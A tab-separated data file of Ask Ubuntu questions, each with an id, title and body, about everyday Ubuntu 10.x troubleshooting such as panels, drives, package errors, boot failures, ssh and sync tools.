25671	quickly template for pyqt ?	because i like qt and python , is there a quickly template for pyqt similar to the pygtk one ?
25672	panels in gnome keep resetting or turning blank	i keep having problems with my gnome panels . what i have done is moved both panels to the bottom of the screen and added a bunch of icons / widgets etc . however i am finding often that when i login sometimes my panels have been restored to the default state with the icon panel at the top but with nothing other than the firefox icon . also sometimes the panels are in the correct place but all the icons have been removed from at least one of the panels . this is quite irritating as i seem to have to spend time setting my entire panel up again at least once every 2 days or so . also my wine applications ( such as spotify ) used to be able to dock in the main notification area , now they are docked in a separate `` wine dock '' which hovers on the desktop , this is not really ideal as i prefer to keeps these in one place . in my $ home/.gnome2/panel2.d/default/launchers folder there seems to be a bunch of symlinks which appear to be the icons that i would usually have on my panel , but they are not visible on the panel . other than this all my profile settings and application settings do not seem to have been lost or changed , just the panels . i ca n't seem to find much evidence of anyone else having this problem and i 've never had it before so i am confused as to why this has started happening and what i can do to prevent it .
25675	external hard drive not recognized	installed ubuntu 10.10 on a hard drive by itself ( no windows ) . all updates are up to date . everything`works fine except when i plug in a 320 gig toshiba external hard drive ... .it is not recognized . when i plug in an 8 gig flash drive it is recognized no problem . what do i mean by `` not recognized '' ? i mean : how do you know it was not recognized . you can check the command `` cat /proc/partitions '' in a terminal with and without the hdd attached . if you see some difference , it 's ok . if the difference is something like `` sda1 '' ( sd+letter+number ) then you have partition on it , maybe it ca n't be handled in ubuntu ( no filesystem on it or so ) . if there is only `` sda '' in the difference for example ( sd+letter , but no number after it ) then the drive itself is detected , just no partition is created on it . also you can check out the messages of the kernel , with the `` dmesg '' command in the terminal . if there is no disk/partition/anything in /proc/partitions , there can be an usb level problem , you can issue command `` lsusb '' as it was suggested before my answer . it 's really matter of what do you mean about `` not recognized '' . @ marco ceppi @ oli @ pitto by `` not recognized '' i meant that when i plug in a 8 gig flash drive an icon immediately appears on the desktop imdicating that there is a flash drive plugged in and i can click on it and view the files on the flash drive . it also shows up on the `` nautilus '' default file manager . when i plug in the 320 gig toshiba external hard drive , i get no indication on the desktop or the file manager ( thus `` not recogized '' ) . when i run the command cat/proc/partitions/ i get an error message could not open location 'file : ///home/bob/cat/proc/partitions ' with or without the external hard drive installed . with the dmeg command i get about 10 pages of info with no mention of disk/partition/anything in /proc/partitions . when i run lsusb command i get the following : bob @ bob-desktop : ~ $ lsusb bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 003 : id 04b3:3003 ibm corp . rapid access iii keyboard bus 003 device 002 : id 04b3:3004 ibm corp. media access pro keyboard bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub
25681	can scripts run even when they are not set as executable ?	i can seem to run scripts ( .sh ) with and without them being set as executable . so where exactly this matters ?
25682	how to research graphics cards	how would you go about choosing which graphics card to purchase . in the past i 've run into situations with graphics cards whose drivers were n't that solid in linux .
25683	how can i specify the language to be used by tesseract when using ocrfeeder	i 'm using the ocr-utility of ocrfeeder . ocrfeeder is using the tesseract-engine . i have installed the several language-packs needed for tesseract . how can i set the language such that tesseract will use the right language-file for converting the scanned document into text ?
25685	enabling single click to open items in nautilus	it seems that nautilus does n't have the usual headings under 11.04 . i 'm used to selecting edit > preferences > behavior and then choosing single-click . how do we enable single-click in 11.04 ?
25687	free remote support applications ?	i 'm using teamviewer right now from my ubuntu system to provide remote support for other linux and windows systems . i also have a paid logmein account , but i ca n't use that in linux . are there any other good free remote support utilities like teamviewer for ubuntu ?
25692	how do i enable the `` extras '' repository ?	i keep reading about an extras repository for ubuntu with new software that comes out independently of the distro release . how do i enable it ?
25693	dpkg behaving strangely ?	when i use apt to get a package , i have been receiving the same error message . here is an example trying to install wicd ( which is already installed ) : reading package lists ... building dependency tree ... reading state information ... wicd is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 1 not upgraded . 3 not fully installed or removed . after this operation , 0b of additional disk space will be used . setting up tex-common ( 2.06 ) ... debconf : unable to initialize frontend : dialog debconf : ( dialog frontend requires a screen at least 13 lines tall and 31 columns wide . ) debconf : falling back to frontend : readline running mktexlsr . this may take some time ... done . no packages found matching texlive-base . dpkg : error processing tex-common ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of texlive-binaries : texlive-binaries depends on tex-common ( > = 2.00 ) ; however : package tex-common is not configured yet . dpkg : error processing texlive-binaries ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of dvipng : dvipng depends on texlive-base-bin ; however : package texlive-base-bin is not installed . package texlive-binaries which provides texlive-base-bin is not configured yet . dpkg : error processing dvipng ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : tex-common texlive-binaries dvipng e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i 'm not sure if this is a problem with apt or with dpkg , but it certainly does n't look good !
25695	initramfs error during boot	boot from ( hd0,0 ) ext3 238ac8ca-9576-443d-8e23-8dd836cd2683 starting up ... mount : mounting /dev/disk/by-uuid/238ac8ca-9576-443d-8e23-8dd836cd2683 on /root failed : invalid argument mount : mounting /dev on /root/dev failed : no such file or directory mount : mounting /sys on /root/sys failed : no such file or directory mount : mounting /proc on /root/proc failed : no such file or directory target filesystem does n't have requested /sbin/init . no init found . try passing init= bootarg . busybox v1.15.3 ( ubuntu 1:1.15.3-1ubuntu5 ) built in shell ( ash ) enter 'help ' for a list of built-in commands .
25701	how can i make a permanently updated copy of a file in a different place to the original file ?	i use two computers , a linux one for coding and building and a windows one which has the programming application to load the built program onto the hardware . both computers have access to a network drive which i use to pass the files from linux to windows . my problem is , that every time i build i have to copy the files from where the are created to the network drive . how can i make some sort of file in the network drive on ubuntu that always mirrors the file which is built in the different location , like a pointer ? thanks !
25702	error : could not display `` obex : // '' when paired with a nokia 3110c	i have paired my nokia 3110c via bt on my pc , i can receive a file from my pc to the phone , but i can not browse the contents of phone from my computer . here is the error message error : did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken . please select another viewer and try again . how can i transfer contents from my phone to my computer ?
25707	merge home directory after fresh installation with existing ( gentoo ) home	i reinstalled my desktop machine with ubuntu 10.10. , coming from gentoo where i used xfce . my home is usually nfs-mounted from a server . during the install i let the installer set up my user , but of course my nfs-home was n't mounted then ; i have a regular /home/user now . if i mv /home /home.old and mount my nfs-home to /home instead , i can not login because gnome complains about some config-files ( sorry , no exact error message as there is no way to copy & paste this ) . which of my /home.old/user directories do i have to copy over to my nfs-home so that gnome is happy again ?
25713	how to stop postgres from autostarting during start up	i have postgresql 8.4 installed on my desktop . it keeps starting on bootup because i think i used default settings . so i issue /etc/init.d/postgresql stop everytime and sometimes i keep forgetting it has folder paths as , /etc/postgresql/8.4/main /usr/lib/postgresql/8.4 there are a lot of configuration files and if someone can tell me where to look and what to change , that will be great . thanks .
25714	how to add a contextual menu item to .psd files in nautilus ?	how to add a contextual menu item to .psd files in nautilus ? the menu item would execute a script and pass it the path of the file .
25717	how do i enable the `` backports '' repository ?	how to enable the backports repository so i can get newer versions of software ?
25723	how to prevent synaptic package manager from asking for password ?	this is similar to how to prevent system applications ( like the software center ) from asking for password ? however that solution does not work for synaptic package manager in 10.04 .
25724	what is the difference between ubuntu software centre and synaptic package manager ?	i am transferring from 8.10 to 10.10 . i was wondering what is the difference between ubuntu software centre and synaptic package manager in 10.10 ? for what kinds of things do i need to go which ? thanks !
25725	what happened to sched_mc_power_savings	my laptop 's battery performance is awful . i can get about an hour and a half out of it , so i 've been looking for some ways to boost the power efficiency of my laptop . i saw the tip to enable this : echo 1 > /sys/devices/system/cpu/sched_mc_power_savings but it does not exist on this installation . what happened to it ?
25727	how do i install the build dependencies for android ?	i 'm trying build the android source using these packages . buti am getting this error : $ sudo apt-get install git-core gnupg flex bison gperf build-essential zip curl zlib1g-dev gcc-multilib g++-multilib libc6-dev-i386 lib32ncurses5-dev ia32-libs x11proto-core-dev libx11-dev lib32readline5-dev lib32z-dev [ sudo ] password for asdf : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libc6-dev-i386 e : unable to locate package lib32ncurses5-dev e : unable to locate package ia32-libs e : unable to locate package lib32readline5-dev e : unable to locate package lib32z-dev i tried to download & install say libc6-dev-i386 debian package form here . but when i double click on the .deb file ubuntu software manager says wrong architecture 'amd64 ' . ( my os : 32-bit ubuntu 10.10 ( updated ) , processor : amd phenom ii 64-bit . )
25732	possible missing firmware /lib/firmware/rtl_nic/rtl8168d-2.fw for module r8169 with 2.6.38 kernel	i notice when i do : sudo update-initramfs -u with the latest kernel release ( 2.6.38 ) i get the following warning messages : update-initramfs : generating /boot/initrd.img-2.6.38-3-generic-pae w : possible missing firmware /lib/firmware/rtl_nic/rtl8168d-2.fw for module r8169 w : possible missing firmware /lib/firmware/rtl_nic/rtl8168d-1.fw for module r8169 how can i resolve this problem ? dean thomson feb 14 at 4:11 wrote : unfortunately , the linux-firmware package is n't for maverick .
25739	force dvds to be auto-mounted using `` unhide '' option by default ?	is there a way to force dvds to be auto-mounted using the `` unhide '' option by default ? currently , in order to see hidden files on a dvd that ubuntu has auto-mounted , i have to unmount it and then re-mount manually like this : sudo mount -t udf -o ro , unhide /dev/cdrom ~/cdrom0/
25742	why is this happening with the wine menu ?	some of the items in the wine menu are given a prefix that is their entire path . the items that do n't have the long prefix seem to work fine , but those that do , do n't respond to the properties button or double-click in the menu editor . they take a lot of space , and look ugly , but i ca n't rename them . i 've tried editing their associated files , there does n't appear to be anything different about them to the ones that are working fine . they were n't always like that - it just happened after an upgrade one day and it 's been like that ever since .
25745	vlc will sometimes have issues displaying video in fullscreen .	recently vlc has been having issues displaying video in fullscreen mode . afaik , nothing has changed with the video card drivers and it 's certainly the same version of vlc . ( /me shakes a fist at the repository maintainers ) this has worked without issue in the past . in fact , i 've had as many as 6 instances of vlc running , each playing a video . one was always fullscreen on my second monitor , while the others were tiled on my primary monitor . i was able to toggle any of the other 5 into fullscreen mode and the video displayed without issue . lately , i 've been having trouble running 2 instances in fullscreen mode . ( sometimes , even a single instance will not display the video in fullscreen . ) vlc will continue to play the video , but in fullscreen mode i see nothing but a black screen . sometimes , the video will display if i maximize the vlc window . other times , i have to settle for a smaller sized window . i do n't know if this is pertinent , but sometimes changing the min/max state of a firefox window ( minefield , specifically ) seemed to allow the troublesome instance to display the video in fullscreen mode . however , that did not prove to be a consistent workaround . sometimes , it seemed that closing a firefox window did the trick , though that is n't consistently successful either . ( i futzed with firefox , because with the crazy number of windows and tabs that i normally have open , it regularly hogs about 1 gb of ram . ) another bit of funkiness that comes to mind is the fact that my secondary monitor is considered the primary on boot-up . i use xrandr to designate the real 1st monitor as primary after boot-up , as suggested by someone in a question i asked on the unix & linux se site . specs : ubuntu 10.10 w/ gnome and compiz 8gb ram amd phenom ii 965 black edition asus m4a79 deluxe mobo xfx ati radeon hd 5750 w/ 1gb ram vlc is configured to use the hardware overlay for video ( as per the default setting ) does anyone have an idea what may cause this issue or how i may go about troubleshooting it ? right now i have 2 instances of vlc playing , each in fullscreen mode on a separate monitor .
25746	/etc/x11/xorg.conf does n't exist ?	i 'm trying to get my video card properly setup to handle 3d acceleration . after searching a bit , i 've come across a few howtos that tell me i need to edit my xorg.conf file . that file does n't exist . x.org is installed by default , i 'm sure , and i figured this video card would be widely supported . 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 09 ) any ideas on how i can get this to work properly and play starcraft ii ? or any game for that matter ? no resolution problems or anything , just no 3d rendering .
25747	why does n't gnome respect onlyshowin=kde ; in .desktop files ?	i have both kde and gnome desktop environments installed on ubuntu 10.10 . when i add the entry onlyshowin=gnome ; in a .desktop file , the application does n't appear in the kde menu . however , when i add onlyshowin=kde ; the file still appears in the gnome menu . does anyone know why this is n't working ? does anyone have a workaround ?
25748	wubi installation can no longer boot , uuid disk not found	yesterday my wubi/vista installation was working fine . i shut it down at the train station , all good then when i attempted to boot ubuntu at home i got a message saying the uuid for root could not be found . by booting with the ubuntu live cd i found that the c : \ubuntu\disks folder stat structure was broken , reported as `` ? ? ? ? ? ? ? ? '' kinda thing . i booted into windows , scheduled a chkdsk , ran that on boot which found some errors and rebooted . still no dice . i am not stressed because it appears my home directory is still there with all my content so i do n't mind re-installing the os ( probably will clean it up some ) . what is the best path from here to repair the wubi installation ? is there anything else i should do to repair it ? i 'm looking at whether the drive is dying now to work out why this occured . possibly i moved the laptop before shutdown had completed .
25750	when syncing , removed contacts still show up ( one contacts )	i just tried out using the ubuntu one contacts app for android . first i imported all the contacts from my phone , sim-card and google mail account , then i spent quite a while removing duplicates which got imported . then i tried to sync it for the first time . the strange thing is that i also got all the contacts which i removed from my contacts list on the website . so i have to set `` show only contacts with phone numbers '' to get all the email addresses i imported from google earlier to not show up , even though i deleted them from the contacts list and have only ubuntu one contacts showing . why is that ? thank you !
25753	not able to suspend or hibernate	my ubuntu 10.10 on my laptop lenovo t400 is not able to suspend or hibernate . whenever i click suspend or hibernate , the moon led on the bottom of the lid flashes a few seconds , the screen quickly shows something like `` some devices fail to suspend , error 5 '' , and then the moon led goes off and the display still has ambient light illumination . i suppose in suspend or hibernation state , the display should have no illumination , just like when the laptop is turned off , right ? if i press any key , the unlock screen dialogue will pop out . i searched a little on the internet , and installed 'acpi-support ' according to some advice but it does not help . any suggestions to solve this problem ? thanks and regards ! added : laptop specifications : cpu intel mobile core 2 duo p8800 @ 2.66ghz penryn 45nm technology ram 1.9gb single-channel ddr3 @ 532mhz ( 7-7-7-20 ) motherboard lenovo 2764cto ( none ) graphics thinkpad display 1440x900 @ 1440x900 ati mobility radeon hd 3400 series ( lenovo ) hard drives 244gb western digital wdc wd2500bevs-08vat2 ( sata ) optical drives hl-dt-st dvdram gsa-u20n azcdw efcpuz452 scsi cdrom device azcdw efcpuz452 scsi cdrom device audio conexant 20561 smartaudio hd
25754	wireless network card not working ( trendnet tew-643pi )	i 've unstalled ubuntu , but i ca n't connect to my wireless network . i have a trendnet tew-643pi card , and many post say it will not work . should i connect my ethernet and try to update the drivers ?
25759	auto-mount cd/dvd drive to single , specific mount point every time ?	currently , whenever i insert a cd or dvd into my dvd drive , it mounts to a location such as /media/ < label > , where < label > is the arbitrary label assigned to the optical disc . i remember , once upon a time , cd and dvd media being reliably located at /media/cdrom0 or something similar . why was this changed ? and how do i get this old behavior back for this drive ? i can understand this behavior for usb sticks . it makes sense for those . but not for cd/dvd media , in my opinion . for example , because of this , i have no way to configure wine to point to my dvd drive , as the mount point changes with every single cd i insert . tl ; dr : how do i make cd/dvd media always mount to /media/cdrom0 ?
25761	broken package error after updating	i updated my system using the update manager and now i am getting a broken package error . i went into synaptic package manager and clicked on fix broken packages but then i got this error . e : /var/cache/apt/archives/dockmanager_0.1.0~bzr80-0ubuntu1~10.10~dockers1_i386.deb : trying to overwrite '/usr/share/dockmanager/data/skype_away.svg ' , which is also in package faenza-icon-theme 0.8 i can not install or remove anything until the broken package is fixed . what should i do now ? update -- as suggested in the aswers , i ran the commands sudo apt-get purge faenza-icon-theme and sudo apt-get -f install but still get the same error , here is what i get . http : //paste.ubuntu.com/565877/ -- -- -- -- -- -- -- -- -- fixed -- -- -- -- -- -- -- -- -- -- -- -- > http : //www.webupd8.org/2011/02/fix-dpkg-error-trying-to-overwrite-x.html
25764	wubildr.mbr missing or corrupt	i 'm dual booting w7 and ubuntu ( installed from wubi ) . i 've had it up and running a few times but today i 'm getting a message from windows boot manager when i select ubuntu that wubildr.mbr is missing or corrupt . any help would be greatly appreciated .
25767	how to get rid of home data encryption ?	i have installed ubuntu as a virtual machine on my windows machine . during installation i selected to use home directory data encryption . now i have a problem that i am running out of disk space on my virtual machine . disk usage analyzer tool shows that .ecryptfs folder occupies the same amount of disk space as my home directory . what do i have to do to get rid of this directory and would it be safe ?
25768	typing special character ©/copyright ?	i know it 's the compose key , and i set it to right alt and i set the `` 3rd level '' option to the shift + alt , but i ca n't figure out for the life of me for example how to do the copyright symbol , or the registered mark , or trademark symbol , etc . i try alt then c but i get č .
25769	why do we have non-free software in the official repositories ?	the ubuntu wiki describes the `` sections '' of the official ubuntu repositories as follows : main - officially supported software . restricted - supported software that is not available under a completely free license . universe - community maintained software , i.e . not officially supported software . multiverse - software that is not free . i thought that software in the ubuntu repositories had to be open source , however does n't the description of the multiverse directly contradicts this ?
25772	manhattan [ mobility radeon hd 5000 series ] support on 10.10	not long ago , canonical published a database of supported components for ubuntu , and i noticed , that my video card manhattan [ mobility radeon hd 5000 series ] have full support only at ubuntu 10.04 lts , but i have installed 10.10 , and want to know , does it have support on this version too ?
25775	network manager disappeared	3 vertical dots appears instead of network manager applet in panel . i can connect to ethernet but i 'm not able to connect to my wireless network . i tried to add/remove the notification area from the panel , but nothing helps .
25778	how can an application ( like firefox ) be forced to use a certain network interface ?	i 've two interfaces : eth0 and wlan0 on a notebook . possible use cases : eth0 grants me internet access , and wlan0 is currently connected to a router which does not have internet-connectivity . for development purposes , i need to connect to the wlan0 by default , but use eth0 for surfing eth0 and wlan0 are both connected to the internet . for a torrent application , eth0 should be used for speed , but for portability of the notebook , ssh should have a connection over wlan0 eth0 is a wire connection , wlan0 is a wireless one . sensible data should be transferred over eth0 , but other traffic can go over wlan0 as well . is there a way to force applications ( like nc.traditional or firefox ) to use a certain network interface ? a wrapper like example-wrapper eth0 program is fine too if such program exist . it would be nice if it could configured within firefox ( in runtime ) . i 'd like to avoid iptables solutions if possible .
25779	launch a gnome session in a ubuntu machine i 'm ssh 'd into ?	i 'm sshing into my friends machine and i 'm wondering how would i launch a gnome session over ssh ? i need to open a web browser on his machine to view something which can only be done from his hostname . what 's the easiest way to achieve this via ssh ?
25785	can auto-hide for the application menu be turned off in unity ?	will there be a way to disable auto-hide behavior of global application menu in unity . while i would prefer to have this behavior disabled by default ( as it is bad ux ) , it looks like it 's here to stay , so i 'm wondering if , as a user , i will be able to turn it off .
25786	deactivate volume amplification ?	i would like to deactivate the amplification feature on my sound volume slider . using any amplification makes the sound really bad with clipping sounds taking over . it 's really annoying to have to worry about where the amplification starts/stops when adjusting the slider from my keyboard or through the gnome panel ( sound thingy ) . i have to open the `` sound preferences '' after each time adjusting the volume and ensure that the level is set to 100 % unamplified . so can i do this someway easy in ubuntu 10.10 ?
25788	why does the ubuntu one website report my phone as `` my phone : other/unspecified '' ?	i have a samsung galaxy 5 , but the ubuntu one phone page reports it as `` other/unspecified '' ? how do i add my phone 's information ?
25789	is there a way to remove maximized window controls/title from top panel in unity	cramming window controls and window title into the top panel , does n't really appeal to me , since it looks like it 's a permanent fixture , i 'm wondering if there is a way to disable this behavior .
25790	when will ubuntu migrate to gtk+ 3.0 ?	i just got known that gtk+ 3.0.0 has been released . will ubuntu 10.10/11.04 come with runtime libraries for gtk+ 3.0 ? are these installed by default ? will ubuntu have development libraries and header files for compilation of gtk+ 3.0 programs ? when will ubuntu ( as whole ) move to gtk 3 ? i 'm mostly concerned about moving audio-recorder app from gtk+ 2.x to 3.0 . references : migrating from gtk+ 2 to gtk+ 3 guide gtk+ 3 reference manual :
25793	will there be an ubuntu one sync extension for the opera browser ?	since opera now support extensions and i use it for my daily use ( great integration of torrent downloader , browser and mail application ) , will there be an extension or is there any instructions on how to sync clients with opera and ubuntu one ?
25794	automation of remote login such that password of remote machine is read from somewhere	i am in server 1 . i need to remotely login to server 2 from server 1 . now from server 2 i will run a script that will scp some file to server3 . i need to write a script in server 1 that will will automatically remote login from server 1 i.e . it reads password of user @ server2 from some file or i can echo password in ssh command . and then it runs the the script in server 2 automatically without any user interference of running it.the automation of scp of server 2 to server 3 has been done in the script that is in server 2 . i just need the automation of above mentioned query . without using expect or ssh-keygen
25799	quick path jumping	i was just at a lecture , where i noticed the lecturer using a command ( probably aliased ) to jump to a specific folder . example : ~/code $ j sciproj ~/projects/sciproj2011/ $ this looked quite slick , so i started wondering : is this a standard utility , and if so , what is the name ? i have two theories as to how it works : it can both create , delete and jump to aliases directly from the command-line in the style of the example , without having to set up aliases in a configuration file or script or whatnot manually . it searches the home directory for a folder matching the name and jumps to it . the second option seems a bit slow , however , so the first would be preferred .
25800	how to run preinstalled windows 7 through ubuntu logged in system ?	i have a pc with dual boot - `` windows 7 and ubuntu 10.10 '' . is it possible to run my windows 7 through ubuntu login ? if possible what app should i have and please give my instructions to install and use it . thank you .
25811	chrome desktop notifications use notify-osd ?	is there a way to make chrome/chromium 's notifications use notify-osd instead of the ugly boxes it uses by default ?
25813	commandline shortcut for current directory similar to ~ for home directory ?	when i use the cp or move command in a terminal window , i 'm currently with bash in a certain folder like this . nes @ server : ~/desktop/dir1 $ and now i wan na copy a file from here ~/anotherdir/dir2 into the current chosen folder in bash ( dir1 ) i would use the command cp ~/anotherdir/dir2/file ~/desktop/dir1 does a shortcut string exist to refer to the current chosen directory ? so that in this example i do n't have to provide the full path to the target dir , but the command knows it should use the current chosen directory in bash ? i.e . as ~ stands for the home directory ?
25822	viewing/editing .vsd files in ubuntu	can anyone suggest a program which can open ms visio .vsd files for editing in ubuntu ?
25823	best practice to replace unknown chars from unknown charsets in filenames ?	i.e . i have a file called portr채t.pdf . but the filename was created with a charsets which is n't properly shown in ubuntu like the following example . what would be the best practice to rename such chars in filenames , when you have several filenames and you ca n't use this special char because of it 's coding in terminal commands ?
25826	execute commands on remote computer	i run a command from my computer : ssh user @ server-name `` df -hp | egrep ' ( /home|/cors ) ' '' the problem is that i get 3 more rows : tput : no value for $ term and no -t specified tput : no value for $ term and no -t specified /etc/bash.bashrc.local : line 9 : histsize : readonly variable what should i do , to not get this 3 rows ? br , wolfy
25828	proper policy for user setup	i am still fairly new to linux hosting and am currently working on some policies for our production ubuntu servers . the servers are public facing webservers with ssh access from the public network and database servers with ssh access from the internal private network . we are a small hosting company so in the past with windows servers we used one user account and one password that each of us used internally . anyone outside of the company who needed to access the server for ftp or anything else had their own user account . is that okay to do in the linux world , or would most people recommend using individual accounts for each person who needs to access the server ?
25829	.bash_history and .cache	i have a user who 's home directory is a mercurial repository . mercurial notified me that there were 2 new unversioned files in my repository . .bash_history and .cache/motd.legal-displayed . i assume bash_history is the history of bash commands for my user . i have no idea what the other is . i do n't want these files to be versioned by mercurial , are they safe to just delete , or will they come back , or mess something up ? can they be moved to somewhere else ? or do i have to add them to my .hgignore file ?
25833	is there a simple mail server i can install ?	i have a desktop install of ubuntu , not server . but i am running a localhost lamp stack for development . is there a simple mail server i can install so that php 's sendmail works ? ideally it will have few options and minimal configuration , and preferably a gui rather than cl interface . edit to add - do i use the local only configuration to test php mail ( ) ?
25838	what are ways for file transfer between computers	i just learned there are several ways to transfer files between windows on two computers from here . i was wondering what are the possible ways to transfer files between ubuntus on two computers ? and between a ubuntu 8.10 computer and a windows-7 computer , or between a ubuntu 10.10 and a windows-xp ? which way requires minimum extra hardwares and which way can achieve the highest transfer speed ? thanks and regards ! ps : i have a rounter .
25843	how to install packages which apt-get ca n't find ?	hi , i need these packages to build android source . but i am getting this error : $ sudo apt-get install git-core gnupg flex bison gperf build-essential zip curl zlib1g-dev gcc-multilib g++-multilib libc6-dev-i386 lib32ncurses5-dev ia32-libs x11proto-core-dev libx11-dev lib32readline5-dev lib32z-dev [ sudo ] password for asdf : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libc6-dev-i386 e : unable to locate package lib32ncurses5-dev e : unable to locate package ia32-libs e : unable to locate package lib32readline5-dev e : unable to locate package lib32z-dev i tried to download & install say libc6-dev-i386 debian package form here & here . but when i double click on the .deb file ubuntu software manager says wrong architecture 'amd64 ' . ( my os : ubuntu 10.10 ( updated ) , processor : amd phenom ii . )
25849	tomboy error while tring to sync with ubuntu one ; can anyone help ?	so i 'm sure you 've heard the song before , but after trying to sync my notes with ubuntu one ( on 10.10 amd64 ) i get `` could not synchronize notes . check the details below and try again . '' of course the problem is that there are no details and trying again does n't help . so i ran tomboy -debug and compared my error to any thing i could find about similar problems ( such as the post here ) but found nothing useful . any way here 's my first error , i got this using preferences > synchronization > ubuntu_one [ error 21:08:42.271 ] synchronization failed with the following exception : string was not recognized as a valid datetime . at system.datetime.parse ( system.string s , iformatprovider provider , datetimestyles styles ) [ 0x00000 ] in < filename unknown > :0 at system.datetime.parse ( system.string s , iformatprovider provider ) [ 0x00000 ] in < filename unknown > :0 at system.datetime.parse ( system.string s ) [ 0x00000 ] in < filename unknown > :0 at tomboy.websync.api.noteinfo.parsejson ( hyena.json.jsonobject jsonobj ) [ 0x00000 ] in < filename unknown > :0 at tomboy.websync.api.userinfo.parsejsonnotearray ( hyena.json.jsonarray jsonarray ) [ 0x00000 ] in < filename unknown > :0 at tomboy.websync.api.userinfo.parsejsonnotes ( system.string jsonstring , system.nullable`1 & latestsyncrevision ) [ 0x00000 ] in < filename unknown > :0 at tomboy.websync.api.userinfo.getnotes ( boolean includecontent , int32 sincerevision , system.nullable`1 & latestsyncrevision ) [ 0x00000 ] in < filename unknown > :0 at tomboy.websync.websyncserver.getnoteupdatessince ( int32 revision ) [ 0x00000 ] in < filename unknown > :0 at tomboy.sync.syncmanager.synchronizationthread ( ) [ 0x00000 ] in < filename unknown > :0 the next thing i tried was using preferences > synchronization > tomboy_web with the default 'http : //one.ubuntu.com/notes/ ' and got the same error plus one more . [ error 21:12:31.949 ] system.objectdisposedexception : the object was used after being disposed . at system.net.httplistener.checkdisposed ( ) [ 0x00000 ] in < filename unknown > :0 at system.net.httplistener.endgetcontext ( iasyncresult asyncresult ) [ 0x00000 ] in < filename unknown > :0 at tomboy.websync.websyncpreferenceswidget. < onauthbuttonclicked > m__1 ( iasyncresult localresult ) [ 0x00000 ] in < filename unknown > :0 [ error 21:13:19.245 ] synchronization failed with the following exception : string was not recognized as a valid datetime . at system.datetime.parse ( system.string s , iformatprovider provider , datetimestyles styles ) [ 0x00000 ] in < filename unknown > :0 at system.datetime.parse ( system.string s , iformatprovider provider ) [ 0x00000 ] in < filename unknown > :0 at system.datetime.parse ( system.string s ) [ 0x00000 ] in < filename unknown > :0 at tomboy.websync.api.noteinfo.parsejson ( hyena.json.jsonobject jsonobj ) [ 0x00000 ] in < filename unknown > :0 at tomboy.websync.api.userinfo.parsejsonnotearray ( hyena.json.jsonarray jsonarray ) [ 0x00000 ] in < filename unknown > :0 at tomboy.websync.api.userinfo.parsejsonnotes ( system.string jsonstring , system.nullable`1 & latestsyncrevision ) [ 0x00000 ] in < filename unknown > :0 at tomboy.websync.api.userinfo.getnotes ( boolean includecontent , int32 sincerevision , system.nullable`1 & latestsyncrevision ) [ 0x00000 ] in < filename unknown > :0 at tomboy.websync.websyncserver.getnoteupdatessince ( int32 revision ) [ 0x00000 ] in < filename unknown > :0 at tomboy.sync.syncmanager.synchronizationthread ( ) [ 0x00000 ] in < filename unknown > :0 i have also tried removing then re-adding my computer from my ubuntu one account , but that did not help either . the only other thing i have noticed is that under system > preferences > ubuntu one > services , `` notes '' is not listed as a service . i do n't know if this is normal or not . thanks for any help and please let me know if anything is confusing .
25856	traffic shaping ( like cfosspeed ) ?	under windows one of my favorite software packages was cfosspeed , a traffic shaping tool . it yields major performance improvements when , for example , having a video conversation while downloading a torrent in the background . is there an alternative for this under ubuntu ?
25860	qt-sdk setup causes segmentation fault	immediately after i start the ./qt-sdk-linux-x86-opensource-2010.05.1.bin setup and press submit , i get a `` segmentation fault '' in the terminal . what should i do ?
25861	wifi wo n't enter working net after hard reboot	i rebooted the hard way after my system jammed again because ff eats all the ram . ( that 's a different problem ) i 've always gotten away with it , but not this time . the system came up ok but it absolutely refuses to log onto the local house wifi net . i know the net is ok as the windows box i 'm writing this on is on it right now . i deleted the connection and rentered the password but it will not go on . /var/lib/networkmanager/networkmanager.state says everything is turned on . i know this is my fault but i 'd really like to get back on the net . the machine is a toshiba satellite . any suggestions ?
25862	how to view video file with external ac3 audio track ?	i can listen to view the video with built-in audio ( ac3 ) and listen to the audio track as regular sound file , but how to do these same time ? ca n't see such options in totem , kplayer , vlc , kmplayer , gnome-mplayer . also i ca n't find how to do this using mplayer , though i may be lost in its huge man file . thanks .
25864	google chrome not working	for some reason the google chrome i installed from the ubuntu software centre is not working . version number : 9.0.597.94-r73967 ( google-chrome-stable ) . what can be wrong ? also , what exactly is chromium web browser ? what 's the difference between the two . firefox is working fine , but i prefer google chrome .
25865	vim text editor not found	i recently started to use ubuntu to program - university standards . i was checking out different text editors and tried to install vim through ubuntu software centre . everything went fine and i got it installed , but i could n't find the launcher ( not sure if that is the right term ) . any reason why this might be the case ?
25872	disable tomboy system tray	first of all , i do n't use indicator applet , but i suppose that the icon/process managing tomboy is the same for both indicator applet and system tray . i want only notificaitons in my system tray ( apps have a different dwelling ! ) . how do i , if at all possible , force tomboy to always start in the `` search all notes '' mode without showing a system tray icon ?
25876	creating basic acpi event makes the system unusably slow	i want to change a few settings on my laptop when i switch to battery power . i created a new event in /etc/acpi/events/cust-battery and it looks like this : event=battery action=/home/skerit/power.sh i put a simple command in the power.sh file : echo this is a test > > /home/skerit/powertest now , when i tail this file it shows `` this is a test '' 4-5 times upon switching to battery power . however , the system becomes totally unstable . it slows down significantly . i ca n't change anything in the terminal . the terminal and certain parts of the screen ( like the gnome system monitor applet ) go blank from time to time . what can be the cause of that ? it 's a simple echo that gets executed a few times !
25877	will a logitech k750 keyboard work ?	is the logitech k750 working in ubuntu 10.10 , maverick meerkat ?
25880	is ubuntu vulnerable to recent exploits using usb sticks and automount ?	i read recently that someone demonstrated a security attack on a pc via the use of automount and a usb stick . how vulnerable am i to this attack and what steps are developers doing to be proactive against this sort of thing ?
